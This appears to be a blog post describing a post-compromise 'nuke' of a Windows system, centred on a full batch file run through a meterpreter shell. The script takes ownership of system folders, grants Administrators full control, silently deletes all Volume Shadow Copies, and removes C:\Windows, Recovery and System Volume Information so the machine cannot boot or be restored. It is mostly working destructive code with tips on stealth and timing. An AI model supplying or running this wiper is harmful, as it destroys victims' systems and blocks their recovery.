For today's exercise I have created a scenario where the target Windows system needs to be nuked after a successful compromise so that it cannot boot back into Windows. Being a Linux user, I have always liked the possibility of nuking the mounted root partition with a single command like "rm -rf /". After all, it is my system and I can zap it whenever I want to. In Windows it is a little harder, and I am sure there are tons of howtos available on the Internet. I needed something stealthy which would run via a meterpreter shell in the background of the target Windows box, so obviously nuking the user's files is not a good idea. We just want to make sure that upon the next reboot the machine will barf up a "Black Screen of Death".
So we have "bypassed" all the pesky AVs and have a nice admin shell.
Next we upload the following batch file to the target system; let's call it nuke.bat:
@echo off
rem Step 1: take ownership of the system directories away from TrustedInstaller/SYSTEM.
rem Output is discarded so nothing shows up on the console of the victim.
echo Taking ownership....
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\* >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul
takeown /f "c:\system volume information\" >nul 2>nul
takeown /f "c:\system volume information\*" >nul 2>nul
rem Step 2: grant Administrators full control, recursively (/t), so rmdir is not stopped by the ACLs.
icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul
rem Step 3: remove the VSS snapshots first so nothing can be rolled back, then delete the system directories.
echo Nuking system files...
vssadmin delete shadows /All /Quiet >nul 2>nul
vssadmin delete shadows /All /Quiet >nul 2>nul
rmdir c:\PerfLogs /s /q >nul 2>nul
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul
echo Done
You need admin privileges for this to work (takeown, icacls on system directories and vssadmin all require an elevated shell), and remember that it will nuke the system!
This operation takes some time, maybe around 2 minutes; the HDD will be working really hard to process all those files, but in Windows all looks fine and the system seems to keep running, because the files that are currently loaded (the running kernel, cmd.exe, DLLs mapped into running processes) stay locked and simply fail to delete, which the >nul 2>nul redirects hide. Everything that is not locked is gone, which is enough to break the next boot. Note also that "stealthy" only holds for the console: "vssadmin delete shadows /All /Quiet" is one of the most widely alerted commands in EDR and SIEM rules because ransomware uses it for exactly this reason, and takeown/icacls sweeping across c:\* are equally noisy in the security event log.
Windows cannot fix itself from the recovery console, and it won't be able to restore any snapshots, as we have deleted them from the batch file. The user files are left intact; there is no need to nuke those. One caveat: "icacls c:\* /grant administrators:f /t" recurses over the whole volume, so while the contents of the user files are untouched, their ACLs are modified (Administrators gain full control on every file), which is visible to anyone who later inspects the disk.
I still prefer the rm -rf / from my Linux box though; the Windows version is much more cumbersome, but maybe there is some magic one-liner in PowerShell perhaps?